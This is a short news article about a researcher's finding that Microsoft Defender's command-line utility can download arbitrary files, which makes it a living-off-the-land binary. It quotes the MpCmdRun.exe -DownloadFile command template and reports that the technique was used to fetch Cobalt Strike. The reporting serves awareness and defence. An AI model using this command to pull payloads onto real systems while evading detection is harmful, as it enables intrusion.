According to penetration tester Mohammad Askar, changes to the Microsoft Defender command line tool could allow attackers to use the software as a living-off-the-land binary (LOLBin).
Numerous LOLBins are present in Windows 10, all of which serve a legitimate function. However, with the right privileges, hackers can abuse these binaries to bypass security facilities and conduct attacks without alerting the victim.
Windows 10 antivirus
As noted by Askar, the Microsoft Defender command line tool now supports a new “-DownloadFile” function. The change is thought to have taken effect with Microsoft Defender version 4.18.2007.9 or 4.18.2009.9.
As a result, an attacker on a local network could use the Microsoft Antimalware Service Command Line Utility to download a file from the internet with the following command: “MpCmdRun.exe -DownloadFile -url <url> -path <local-path>”.
Using this technique, Askar was able to download Cobalt Strike malware from a remote location directly via Microsoft Defender.
While Defender will detect and mitigate any malicious files downloaded using this method, it is unclear whether other popular antivirus services will be able to defend against this avenue of attack, in instances in which native protections have been disabled.
System administrators are advised to update their watchlists to include the new LOLBin, to ensure it is not used to mount an attack.
TechRadar Pro has asked Askar to advise on how individual users should set about protecting themselves but is yet to receive a response.